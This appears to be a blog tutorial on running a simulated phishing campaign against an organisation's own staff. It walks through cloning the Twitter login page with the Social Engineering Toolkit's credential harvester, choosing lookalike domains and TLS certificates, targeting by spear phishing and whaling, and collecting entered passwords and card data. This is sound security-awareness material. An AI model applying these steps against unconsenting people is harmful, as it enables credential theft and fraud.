My advice to any company looking to improve their security is to run a simulated social engineering attack on their staff before even thinking about anything else. In a study conducted by the Ponemon Institute, a staggering 54% of security breaches are caused by negligent actions of employees or contractors rather than complicated, technical attacks from hackers.
In this post, you will learn how to set up a simulated phishing attack to run against staff in your own organisation.
Phishing is the practice of fraudulently attempting to obtain sensitive information from a target by masquerading messages as if they came from a trustworthy entity. Usually, the phisher tries to extract usernames, email addresses, password and credit card numbers by sending vague emails:
This phishing email looks like it could genuinely be from Apple and would fool many people into clicking the link to "verify their account", especially with the sense of urgency brought about with the line:
Failure to complete our validation process will result in a suspension of your Apple ID.
The most successful phishing emails create a sense of urgency to scare recipients into thinking something bad will happen if they do not take immediate action, rather than by trying to incentivise someone with something good that will happen if they do take immediate action. That is, people are broadly more trusting of emails to prevent bad things on their accounts and less trusting of good (especially free) things offered by the same means.
In case there was any doubt with the above email, the link to verify the account certainly does not go to any Apple website, and an attacker will receive any information entered into the fake system. The hacker hopes to be able to access the accounts of multiple victims who each fill in their details in order to further exploit them or to sell their information on black markets.
Phishing On The Web
Although phishing attacks are usually delivered by email, it is worth knowing that any platform where links can be shared can be the source of a phishing attack, including:
- Social media websites
- Product Forums
- Review websites
- Chat applications like Slack, WhatsApp and Skype
- SMS messages
This knowledge is useful for a company when setting up their simulated phishing attack as they can choose multiple media platforms to distribute links to their staff.
Setting Up A Simulated Phishing Attack
There are two primary decisions to be made in order to run a simulated phishing attack:
- Which action to encourage users to take
- Which delivery media to use to distribute phishing messages
Most frequently, organisations will check if staff click a link in an email to a fraudulent system and process to login.
As a separate test, many organisations will also measure how many staff download an attachment from an email, simulating the risk of the distribution of malware, ransomware and other viruses.
Part 1: Cloning A Website
In this tutorial, we will clone the Twitter login page, but the same techniques can be used to clone nearly any website with a login page.
The tool of choice is the Social Engineering Toolkit, available on GitHub and installed by default on Kali Linux machines.
The website cloner tool can be reached by following the options when running the Toolkit:
- Social-Engineering Attacks
- Website Attack Vectors
- Credential Harvester Attack Method
- Site Cloner
An IP address needs to be entered for the machine that will receive incoming data, and the URL of the website to clone is required too.
Entering the IP address of your local machine and the URL "https://twitter.com/login/", starts a webserver on localhost with the following page:
Notice the website is not being hosted on the twitter.com domain. However, phishing attacks are so successful because the address bar is so rarely inspected by the typical user. A sneaky attacker would register and host this page on a domain like "twtter.com" - a domain that resembles the real domain name but is definitely not the real Twitter.
For a real attack across the internet, this system would be hosted on a system with a domain name and a public IP address. Further, the domain name would have a TLS certificate from a vendor like Let's Encrypt to make the connection secure. Most users will believe the website is safe because of the green "secure" badge, but all it actually means is the connection to the website is secure!
Part 2: Distributing Links
After the attacker has set up the fake website, all that is required is to share a link to the new website in a convincing manner.
Most phishing attackers will send a generic email to a large number of email address, hoping at least some will fall for the trickery. These emails will not contain any personally identifiable information and are usually easy to spot.
Alternatively, "spear phishing" is the practice of crafting the email message to specifically target segments of recipients to make it appear to be genuine. For example, the message would mention a specific project, company or interest of the target recipients groups in an increased effort to get a positive response.
Segmenting the recipients even further, "whaling" is the highly-targeted process of sending phishing emails only to senior staff and executives within an organisation. The process is the same, but the messages are highly-crafted to target specific members of an organisation that will usually have the authority and access to process sensitive requests.
When running a simulated attack on an organisation, spear phishing and whaling can be used to significantly improve the response rate of the attacks, albeit at the cost of an increased difficulty to set up.
Part 3: Capturing Data
When users open a link and enter data into the cloned website, all information is automatically sent back to the attacker to the IP address entered during setup. This means the attacker will see all usernames, passwords, credit card information and other values entered in any forms:
Additionally, the toolkit can export a handy report as well:
Setting up a simulated phishing attack can be rather simple by installing and running the Social Engineering Toolkit on a virtual machine and configuring domain name records. The hard part is to distribute links, automate the process and avoid getting caught.
However, when running a simulation like this in your organisation, you may just be surprised by the results.